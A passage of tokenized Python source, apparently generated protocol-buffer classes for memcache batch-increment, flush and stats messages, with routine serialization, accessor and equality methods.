<NUM_LIT> ) <EOL> out . putVarInt32 ( self . override_ . ByteSize ( ) ) <EOL> self . override_ . OutputUnchecked ( out ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_name_space_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . name_space_ ) <EOL> for i in xrange ( len ( self . item_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . item_ [ i ] . ByteSizePartial ( ) ) <EOL> self . item_ [ i ] . OutputPartial ( out ) <EOL> if ( self . has_override_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . override_ . ByteSizePartial ( ) ) <EOL> self . override_ . OutputPartial ( out ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:10> : <EOL> self . set_name_space ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> length = d . getVarInt32 ( ) <EOL> tmp = ProtocolBuffer . Decoder ( d . buffer ( ) , d . pos ( ) , d . pos ( ) + length ) <EOL> d . skip ( length ) <EOL> self . add_item ( ) . TryMerge ( tmp ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> length = d . getVarInt32 ( ) <EOL> tmp = ProtocolBuffer . Decoder ( d . buffer ( ) , d . pos ( ) , d . pos ( ) + length ) <EOL> d . skip ( length ) <EOL> self . mutable_override ( ) . TryMerge ( tmp ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_name_space_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . name_space_ ) ) <EOL> cnt = <NUM_LIT:0> <EOL> for e in self . item_ : <EOL> elm = "<STR_LIT>" <EOL> if printElemNumber : elm = "<STR_LIT>" % cnt <EOL> res += prefix + ( "<STR_LIT>" % elm ) <EOL> res += e . __str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> cnt += <NUM_LIT:1> <EOL> if self . has_override_ : <EOL> res += prefix + "<STR_LIT>" <EOL> res += self . override_ . __str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> kname_space = <NUM_LIT:1> <EOL> kitem = <NUM_LIT:2> <EOL> koverride = <NUM_LIT:3> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> } , <NUM_LIT:3> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:3> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:3> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class MemcacheBatchIncrementResponse ( ProtocolBuffer . ProtocolMessage ) : <EOL> def __init__ ( self , contents = None ) : <EOL> self . item_ = [ ] <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def item_size ( self ) : return len ( self . item_ ) <EOL> def item_list ( self ) : return self . item_ <EOL> def item ( self , i ) : <EOL> return self . item_ [ i ] <EOL> def mutable_item ( self , i ) : <EOL> return self . item_ [ i ] <EOL> def add_item ( self ) : <EOL> x = MemcacheIncrementResponse ( ) <EOL> self . item_ . append ( x ) <EOL> return x <EOL> def clear_item ( self ) : <EOL> self . item_ = [ ] <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> for i in xrange ( x . item_size ( ) ) : self . add_item ( ) . CopyFrom ( x . item ( i ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if len ( self . item_ ) != len ( x . item_ ) : return <NUM_LIT:0> <EOL> for e1 , e2 in zip ( self . item_ , x . item_ ) : <EOL> if e1 != e2 : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> for p in self . item_ : <EOL> if not p . IsInitialized ( debug_strs ) : initialized = <NUM_LIT:0> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += <NUM_LIT:1> * len ( self . item_ ) <EOL> for i in xrange ( len ( self . item_ ) ) : n += self . lengthString ( self . item_ [ i ] . ByteSize ( ) ) <EOL> return n <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += <NUM_LIT:1> * len ( self . item_ ) <EOL> for i in xrange ( len ( self . item_ ) ) : n += self . lengthString ( self . item_ [ i ] . ByteSizePartial ( ) ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_item ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> for i in xrange ( len ( self . item_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putVarInt32 ( self . item_ [ i ] . ByteSize ( ) ) <EOL> self . item_ [ i ] . OutputUnchecked ( out ) <EOL> def OutputPartial ( self , out ) : <EOL> for i in xrange ( len ( self . item_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putVarInt32 ( self . item_ [ i ] . ByteSizePartial ( ) ) <EOL> self . item_ [ i ] . OutputPartial ( out ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:10> : <EOL> length = d . getVarInt32 ( ) <EOL> tmp = ProtocolBuffer . Decoder ( d . buffer ( ) , d . pos ( ) , d . pos ( ) + length ) <EOL> d . skip ( length ) <EOL> self . add_item ( ) . TryMerge ( tmp ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> cnt = <NUM_LIT:0> <EOL> for e in self . item_ : <EOL> elm = "<STR_LIT>" <EOL> if printElemNumber : elm = "<STR_LIT>" % cnt <EOL> res += prefix + ( "<STR_LIT>" % elm ) <EOL> res += e . __str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> cnt += <NUM_LIT:1> <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> kitem = <NUM_LIT:1> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> } , <NUM_LIT:1> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:1> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class MemcacheFlushRequest ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_override_ = <NUM_LIT:0> <EOL> override_ = None <EOL> def __init__ ( self , contents = None ) : <EOL> self . lazy_init_lock_ = thread . allocate_lock ( ) <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def override ( self ) : <EOL> if self . override_ is None : <EOL> self . lazy_init_lock_ . acquire ( ) <EOL> try : <EOL> if self . override_ is None : self . override_ = AppOverride ( ) <EOL> finally : <EOL> self . lazy_init_lock_ . release ( ) <EOL> return self . override_ <EOL> def mutable_override ( self ) : self . has_override_ = <NUM_LIT:1> ; return self . override ( ) <EOL> def clear_override ( self ) : <EOL> if self . has_override_ : <EOL> self . has_override_ = <NUM_LIT:0> ; <EOL> if self . override_ is not None : self . override_ . Clear ( ) <EOL> def has_override ( self ) : return self . has_override_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_override ( ) ) : self . mutable_override ( ) . MergeFrom ( x . override ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_override_ != x . has_override_ : return <NUM_LIT:0> <EOL> if self . has_override_ and self . override_ != x . override_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( self . has_override_ and not self . override_ . IsInitialized ( debug_strs ) ) : initialized = <NUM_LIT:0> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_override_ ) : n += <NUM_LIT:1> + self . lengthString ( self . override_ . ByteSize ( ) ) <EOL> return n <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_override_ ) : n += <NUM_LIT:1> + self . lengthString ( self . override_ . ByteSizePartial ( ) ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_override ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> if ( self . has_override_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putVarInt32 ( self . override_ . ByteSize ( ) ) <EOL> self . override_ . OutputUnchecked ( out ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_override_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putVarInt32 ( self . override_ . ByteSizePartial ( ) ) <EOL> self . override_ . OutputPartial ( out ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:10> : <EOL> length = d . getVarInt32 ( ) <EOL> tmp = ProtocolBuffer . Decoder ( d . buffer ( ) , d . pos ( ) , d . pos ( ) + length ) <EOL> d . skip ( length ) <EOL> self . mutable_override ( ) . TryMerge ( tmp ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_override_ : <EOL> res += prefix + "<STR_LIT>" <EOL> res += self . override_ . __str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> koverride = <NUM_LIT:1> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> } , <NUM_LIT:1> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:1> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class MemcacheFlushResponse ( ProtocolBuffer . ProtocolMessage ) : <EOL> def __init__ ( self , contents = None ) : <EOL> pass <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> return n <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> return n <EOL> def Clear ( self ) : <EOL> pass <EOL> def OutputUnchecked ( self , out ) : <EOL> pass <EOL> def OutputPartial ( self , out ) : <EOL> pass <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> } , <NUM_LIT:0> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> } , <NUM_LIT:0> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class MemcacheStatsRequest ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_override_ = <NUM_LIT:0> <EOL> override_ = None <EOL> has_max_hotkey_count_ = <NUM_LIT:0> <EOL> max_hotkey_count_ = <NUM_LIT:0> <EOL> def __init__ ( self , contents = None ) : <EOL> self . lazy_init_lock_ = thread . allocate_lock ( ) <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def override ( self ) : <EOL> if self . override_ is None : <EOL> self . lazy_init_lock_ . acquire ( ) <EOL> try : <EOL> if self . override_ is None : self . override_ = AppOverride ( ) <EOL> finally : <EOL> self . lazy_init_lock_ . release ( ) <EOL> return self . override_ <EOL> def mutable_override ( self ) : self . has_override_ = <NUM_LIT:1> ; return self . override ( ) <EOL> def clear_override ( self ) : <EOL> if self . has_override_ : <EOL> self . has_override_ = <NUM_LIT:0> ; <EOL> if self . override_ is not None : self . override_ . Clear ( ) <EOL> def has_override ( self ) : return self . has_override_ <EOL> def max_hotkey_count ( self ) : return self . max_hotkey_count_ <EOL> def set_max_hotkey_count ( self , x ) : <EOL> self . has_max_hotkey_count_ = <NUM_LIT:1> <EOL> self . max_hotkey_count_ = x <EOL> def clear_max_hotkey_count ( self ) : <EOL> if self . has_max_hotkey_count_ : <EOL> self . has_max_hotkey_count_ = <NUM_LIT:0> <EOL> self . max_hotkey_count_ = <NUM_LIT:0> <EOL> def has_max_hotkey_count ( self ) : return self . has_max_hotkey_count_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_override ( ) ) : self . mutable_override ( ) . MergeFrom ( x . override ( ) ) <EOL> if ( x . has_max_hotkey_count ( ) ) : self . set_max_hotkey_count ( x . max_hotkey_count ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_override_ != x . has_override_ : return <NUM_LIT:0> <EOL> if self . has_override_ and self . override_ != x . override_ : return <NUM_LIT:0> <EOL> if self . has_max_hotkey_count_ != x . has_max_hotkey_count_ : return <NUM_LIT:0> <EOL> if self . has_max_hotkey_count_ and self . max_hotkey_count_ != x . max_hotkey_count_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( self . has_override_ and not self . override_ . IsInitialized ( debug_strs ) ) : initialized = <NUM_LIT:0> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_override_ ) : n += <NUM_LIT:1> + self . lengthString ( self . override_ . ByteSize ( ) ) <EOL> if ( self . has_max_hotkey_count_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . max_hotkey_count_ ) <EOL> return n <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_override_ ) : n += <NUM_LIT:1> + self . lengthString ( self . override_ . ByteSizePartial ( ) ) <EOL> if ( self . has_max_hotkey_count_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . max_hotkey_count_ ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_override ( ) <EOL> self . clear_max_hotkey_count ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> if ( self . has_override_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putVarInt32 ( self . override_ . ByteSize ( ) ) <EOL> self . override_ . OutputUnchecked ( out ) <EOL> if ( self . has_max_hotkey_count_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:16> ) <EOL> out . putVarInt32 ( self . max_hotkey_count_ ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_override_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putVarInt32 ( self . override_ . ByteSizePartial ( ) ) <EOL> self . override_ . OutputPartial ( out ) <EOL> if ( self . has_max_hotkey_count_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:16> ) <EOL> out . putVarInt32 ( self . max_hotkey_count_ ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:10> : <EOL> length = d . getVarInt32 ( ) <EOL> tmp = ProtocolBuffer . Decoder ( d . buffer ( ) , d . pos ( ) , d . pos ( ) + length ) <EOL> d . skip ( length ) <EOL> self . mutable_override ( ) . TryMerge ( tmp ) <EOL> continue <EOL> if tt == <NUM_LIT:16> : <EOL> self . set_max_hotkey_count ( d . getVarInt32 ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_override_ : <EOL> res += prefix + "<STR_LIT>" <EOL> res += self . override_ . __str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> if self . has_max_hotkey_count_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt32 ( self . max_hotkey_count_ ) ) <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> koverride = <NUM_LIT:1> <EOL> kmax_hotkey_count = <NUM_LIT:2> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> } , <NUM_LIT:2> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . NUMERIC , <EOL> } , <NUM_LIT:2> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class MergedNamespaceStats ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_hits_ = <NUM_LIT:0> <EOL> hits_ = <NUM_LIT:0> <EOL> has_misses_ = <NUM_LIT:0> <EOL> misses_ = <NUM_LIT:0> <EOL> has_byte_hits_ = <NUM_LIT:0> <EOL> byte_hits_ = <NUM_LIT:0> <EOL> has_items_ = <NUM_LIT:0> <EOL> items_ = <NUM_LIT:0> <EOL> has_bytes_ = <NUM_LIT:0> <EOL> bytes_ = <NUM_LIT:0> <EOL> has_oldest_item_age_ = <NUM_LIT:0> <EOL> oldest_item_age_ = <NUM_LIT:0> <EOL> def __init__ ( self , contents = None ) : <EOL> self . hotkeys_ = [ ] <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def hits ( self ) : return self . hits_ <EOL> def set_hits ( self , x ) : <EOL> self . has_hits_ = <NUM_LIT:1> <EOL> self . hits_ = x <EOL> def clear_hits ( self ) : <EOL> if self . has_hits_ : <EOL> self . has_hits_ = <NUM_LIT:0> <EOL> self . hits_ = <NUM_LIT:0> <EOL> def has_hits ( self ) : return self . has_hits_ <EOL> def misses ( self ) : return self . misses_ <EOL> def set_misses ( self , x ) : <EOL> self . has_misses_ = <NUM_LIT:1> <EOL> self . misses_ = x <EOL> def clear_misses ( self ) : <EOL> if self . has_misses_ : <EOL> self . has_misses_ = <NUM_LIT:0> <EOL> self . misses_ = <NUM_LIT:0> <EOL> def has_misses ( self ) : return self . has_misses_ <EOL> def byte_hits ( self ) : return self . byte_hits_ <EOL> def set_byte_hits ( self , x ) : <EOL> self . has_byte_hits_ = <NUM_LIT:1> <EOL> self . byte_hits_ = x <EOL> def clear_byte_hits ( self ) : <EOL> if self . has_byte_hits_ : <EOL> self . has_byte_hits_ = <NUM_LIT:0> <EOL> self . byte_hits_ = <NUM_LIT:0> <EOL> def has_byte_hits ( self ) : return self . has_byte_hits_ <EOL> def items ( self ) : return self . items_ <EOL> def set_items ( self , x ) : <EOL> self . has_items_ = <NUM_LIT:1> <EOL> self . items_ = x <EOL> def clear_items ( self ) : <EOL> if self . has_items_ : <EOL> self . has_items_ = <NUM_LIT:0> <EOL> self . items_ = <NUM_LIT:0> <EOL> def has_items ( self ) : return self . has_items_ <EOL> def bytes ( self ) : return self . bytes_ <EOL> def set_bytes ( self , x ) : <EOL> self . has_bytes_ = <NUM_LIT:1> <EOL> self . bytes_ = x <EOL> def clear_bytes ( self ) : <EOL> if self . has_bytes_ : <EOL> self . has_bytes_ = <NUM_LIT:0> <EOL> self . bytes_ = <NUM_LIT:0> <EOL> def has_bytes ( self ) : return self . has_bytes_ <EOL> def oldest_item_age ( self ) : return self . oldest_item_age_ <EOL> def set_oldest_item_age ( self , x ) : <EOL> self . has_oldest_item_age_ = <NUM_LIT:1> <EOL> self . oldest_item_age_ = x <EOL> def clear_oldest_item_age ( self ) : <EOL> if self . has_oldest_item_age_ : <EOL> self . has_oldest_item_age_ = <NUM_LIT:0> <EOL> self . oldest_item_age_ = <NUM_LIT:0> <EOL> def has_oldest_item_age ( self ) : return self . has_oldest_item_age_ <EOL> def hotkeys_size ( self ) : return len ( self . hotkeys_ ) <EOL> def hotkeys_list ( self ) : return self . hotkeys_ <EOL> def hotkeys ( self , i ) : <EOL> return self . hotkeys_ [ i ] <EOL> def mutable_hotkeys ( self , i ) : <EOL> return self . hotkeys_ [ i ] <EOL> def add_hotkeys ( self ) : <EOL> x = MemcacheHotKey ( ) <EOL> self . hotkeys_ . append ( x ) <EOL> return x <EOL> def clear_hotkeys ( self ) : <EOL> self . hotkeys_ = [ ] <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_hits ( ) ) : self . set_hits ( x . hits ( ) ) <EOL> if ( x . has_misses ( ) ) : self . set_misses ( x . misses ( ) ) <EOL> if ( x . has_byte_hits ( ) ) : self . set_byte_hits ( x . byte_hits ( ) ) <EOL> if ( x . has_items ( ) ) : self . set_items ( x . items ( ) ) <EOL> if ( x . has_bytes ( ) ) : self . set_bytes ( x . bytes ( ) ) <EOL> if ( x . has_oldest_item_age ( ) ) : self . set_oldest_item_age ( x . oldest_item_age ( ) ) <EOL> for i in xrange ( x . hotkeys_size ( ) ) : self . add_hotkeys ( ) . CopyFrom ( x . hotkeys ( i ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_hits_ != x . has_hits_ : return <NUM_LIT:0> <EOL> if self . has_hits_ and self . hits_ != x . hits_ : return <NUM_LIT:0> <EOL> if self . has_misses_ != x . has_misses_ : return <NUM_LIT:0> <EOL> if self . has_misses_ and self . misses_ != x . misses_ : return <NUM_LIT:0> <EOL> if self . has_byte_hits_ != x . has_byte_hits_ : return <NUM_LIT:0> <EOL> if self . has_byte_hits_ and self . byte_hits_ != x . byte_hits_ : return <NUM_LIT:0> <EOL> if self . has_items_ != x . has_items_ : return <NUM_LIT:0> <EOL> if self . has_items_ and self . items_ != x . items_ : return <NUM_LIT:0> <EOL> if self . has_bytes_ != x . has_bytes_ : return <NUM_LIT:0> <EOL> if self . has_bytes_ and self . bytes_ != x . bytes_ : return <NUM_LIT:0> <EOL> if self . has_oldest_item_age_ != x . has_oldest_item_age_ : return <NUM_LIT:0> <EOL> if self . has_oldest_item_age_ and self . oldest_item_age_ != x . oldest_item_age_ : return <NUM_LIT:0> <EOL> if len ( self . hotkeys_ ) != len ( x . hotkeys_ ) : return <NUM_LIT:0> <EOL> for e1 , e2 in zip ( self . hotkeys_ , x . hotkeys_ ) : <EOL> if e1 != e2 : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( not self . has_hits_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> if ( not self . has_misses_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> if ( not self . has_byte_hits_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> if ( not self . has_items_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> if ( not self . has_bytes_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> if ( not self . has_oldest_item_age_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> for p in self . hotkeys_ : <EOL> if not p . IsInitialized ( debug_strs ) : initialized = <NUM_LIT:0> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += self . lengthVarInt64 ( self . hits_ ) <EOL> n += self . lengthVarInt64 ( self . misses_ ) <EOL> n += self . lengthVarInt64 ( self . byte_hits_ ) <EOL> n += self . lengthVarInt64 ( self . items_ ) <EOL> n += self . lengthVarInt64 ( self . bytes_ ) <EOL> n += <NUM_LIT:1> * len ( self . hotkeys_ ) <EOL> for i in xrange ( len ( self . hotkeys_ ) ) : n += self . lengthString ( self . hotkeys_ [ i ] . ByteSize ( ) ) <EOL> return n + <NUM_LIT:10> <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_hits_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthVarInt64 ( self . hits_ ) <EOL> if ( self . has_misses_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthVarInt64 ( self . misses_ ) <EOL> if ( self . has_byte_hits_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthVarInt64 ( self . byte_hits_ ) <EOL> if ( self . has_items_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthVarInt64 ( self . items_ ) <EOL> if ( self . has_bytes_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthVarInt64 ( self . bytes_ ) <EOL> if ( self . has_oldest_item_age_ ) : <EOL> n += <NUM_LIT:5> <EOL> n += <NUM_LIT:1> * len ( self . hotkeys_ ) <EOL> for i in xrange ( len ( self . hotkeys_ ) ) : n += self . lengthString ( self . hotkeys_ [ i ] . ByteSizePartial ( ) ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_hits ( ) <EOL> self . clear_misses ( ) <EOL> self . clear_byte_hits ( ) <EOL> self . clear_items ( ) <EOL> self . clear_bytes ( ) <EOL> self . clear_oldest_item_age ( ) <EOL> self . clear_hotkeys ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> out . putVarInt32 ( <NUM_LIT:8> ) <EOL> out . putVarUint64 ( self . hits_ ) <EOL> out . putVarInt32 ( <NUM_LIT:16> ) <EOL> out . putVarUint64 ( self . misses_ ) <EOL> out . putVarInt32 